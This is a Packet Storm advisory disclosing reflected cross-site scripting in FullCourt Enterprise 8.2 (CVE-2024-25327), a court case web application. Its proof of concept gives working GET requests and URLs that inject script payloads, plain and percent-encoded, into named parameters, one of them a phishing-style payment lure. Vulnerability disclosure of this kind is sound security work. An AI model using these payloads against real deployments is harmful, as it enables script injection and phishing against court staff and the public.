FullCourt Enterprise 8.2 Cross Site Scripting ≈ Packet Storm

Home^[1] Files^[2] News^[3] &[SERVICES_TAB] Contact^[4] Add New^[5]

Change Mirror^[12] Download^[13]

        # Exploit Title: FullCourt enterprise XSS
# Date: 2023-28-12
# Exploit Author: Omar Sabagh
# Author Linkedin: https://www.linkedin.com/in/omar-s-b937791a2/
# Vendor Homepage: https://www.justicesystems.com
# Software Link: https://www.justicesystems.com/products/fullcourt-enterprise/
# Version:  FullCourt enterprise - V8.2
# CVE : CVE-2024-25327
# Summary: 
During a penetration test conducted in December of 2023, It was discovered that the full court enterprise web application was susceptible to reflected (obfuscated and unobfuscated) XSS attacks which could be injected in multiple parameters. This allows an attacker to redirect victims, create pop ups and load external resources (such as externally hosted images). 
# POC: 
XSS example 1.)
GET /fullcourtweb/courtCase.do?courtCaseBean.currentDefendantID=&formatCaseType=&formatCaseYear=2023&formatCaseNumber=0000000b9wsx%3cscript%3ealert(1)%3c%2fscript%3ec5yblw44633&retrieveAction.x=0&retrieveAction.y=0&courtCaseBean.criminalJuvenileCaseDomesticViolenceIndicator=&courtCaseBean.physicalFile=&courtCaseBean.sealed=&courtCaseBean.juryRequested=&courtCaseBean.batchLabelPrint=&courtCaseBean.juryVerdict=&courtCaseBean.citationImportCase=&doLabelSelect=false&printTrafficJacket=false&reportBean.reportMode=ledger&labelType=on HTTP/1.1
--The value of the formatCaseNumber request parameter is copied into the HTML document as plain text between tags. The payload b9wsx<script>alert(1)</script>c5yblw44633 was submitted in the formatCaseNumber parameter. This input was echoed unmodified in the application's response.
--This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
--The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
XSS example 2.)
GET /fullcourtweb/courtCase.do?courtCaseBean.currentDefendantID=&formatCaseType=&formatCaseYear=2023&formatCaseNumber=0000000vymvd%d3cscript%3ealert(1)%3c%2fscript%3erkoqwks4vtrfy0vi%3cscript%3ealert(1)%3c%2fscript%3egonoz&retrieveAction.x=0&retrieveAction.y=0&courtCaseBean.juryRequested=&courtCaseBean.batchLabelPrint=&courtCaseBean.physicalFile=&courtCaseBean.sealed=&=&doLabelSelect=false&printTrafficJacket=false&reportBean.reportMode=ledger&labelType=on HTTP/1.1
--The value of the formatCaseNumber request parameter is copied into the HTML document as plain text between tags. The payload fy0vi<script>alert(1)</script>gonoz was submitted in the formatCaseNumber parameter. This input was echoed unmodified in the application's response.
XSS example 3.)
--Unobfuscated direct URL injection
https://example-site.com/fullcourtweb/mvc/citationSearch?Index=1&r=qQDpfmw1%3C<script>alert('Bob--you owe 500 dollars,click here to resolve')</script>%3Ex5zbiql8jrw&citationNumber=12345&searchAction=
--Obfuscated direct URL injection:
https://example-site.com/fullcourtweb/mvc/citationSearch?Index=1&r=qQDpfmw1%3C%73cr%69pt%3E%61ler%74(%27%4F%77ned%20%62y%20%4Fm%61r%27)%3C%2f%73cr%69pt%3Ex5zbiql8jrw&citationNumber=53267&searchAction=
--For both examples, The value of the r request parameter is copied into the HTML document as plain text between tags. The payloads were submitted in the r parameter. This input was echoed unmodified in the application's response.

• Follow us on Twitter^[16]
• Follow us on Facebook^[17]
• Subscribe to an RSS Feed^[18]

File Tags

• ActiveX^[19] (933)
• Advisory^[20] (84,418)
• Arbitrary^[21] (16,587)
• BBS^[22] (2,859)
• Bypass^[23] (1,821)
• CGI^[24] (1,032)
• Code Execution^[25] (7,583)
• Conference^[26] (687)
• Cracker^[27] (844)
• CSRF^[28] (3,370)
• DoS^[29] (24,393)
• Encryption^[30] (2,382)
• Exploit^[31] (52,621)
• File Inclusion^[32] (4,247)
• File Upload^[33] (982)
• Firewall^[34] (822)
• Info Disclosure^[35] (2,833)
• Intrusion Detection^[36] (905)
• Java^[37] (3,117)
• JavaScript^[38] (887)
• Kernel^[39] (6,948)
• Local^[40] (14,662)
• Magazine^[41] (586)
• Overflow^[42] (12,993)
• Perl^[43] (1,430)
• PHP^[44] (5,176)
• Proof of Concept^[45] (2,364)
• Protocol^[46] (3,688)
• Python^[47] (1,595)
• Remote^[48] (31,297)
• Root^[49] (3,615)
• Rootkit^[50] (519)
• Ruby^[51] (617)
• Scanner^[52] (1,647)
• Security Tool^[53] (7,963)
• Shell^[54] (3,236)
• Shellcode^[55] (1,217)
• Sniffer^[56] (899)
• Spoof^[57] (2,255)
• SQL Injection^[58] (16,493)
• TCP^[59] (2,421)
• Trojan^[60] (688)
• UDP^[61] (896)
• Virus^[62] (668)
• Vulnerability^[63] (32,473)
• Web^[64] (9,840)
• Whitepaper^[65] (3,768)
• x86^[66] (966)
• XSS^[67] (18,131)
• Other^[68]

File Archives

• March 2024^[69]
• February 2024^[70]
• January 2024^[71]
• December 2023^[72]
• November 2023^[73]
• October 2023^[74]
• September 2023^[75]
• August 2023^[76]
• July 2023^[77]
• June 2023^[78]
• May 2023^[79]
• April 2023^[80]
• Older^[81]

Systems

• AIX^[82] (429)
• Apple^[83] (2,060)
• BSD^[84] (375)
• CentOS^[85] (57)
• Cisco^[86] (1,926)
• Debian^[87] (6,979)
• Fedora^[88] (1,693)
• FreeBSD^[89] (1,246)
• Gentoo^[90] (4,466)
• HPUX^[91] (880)
• iOS^[92] (369)
• iPhone^[93] (108)
• IRIX^[94] (220)
• Juniper^[95] (69)
• Linux^[96] (48,834)
• Mac OS X^[97] (691)
• Mandriva^[98] (3,105)
• NetBSD^[99] (256)
• OpenBSD^[100] (487)
• RedHat^[101] (15,241)
• Slackware^[102] (941)
• Solaris^[103] (1,611)
• SUSE^[104] (1,444)
• Ubuntu^[105] (9,344)
• UNIX^[106] (9,371)
• UnixWare^[107] (187)
• Windows^[108] (6,636)
• Other^[109]

© 2022 Packet Storm. All rights reserved.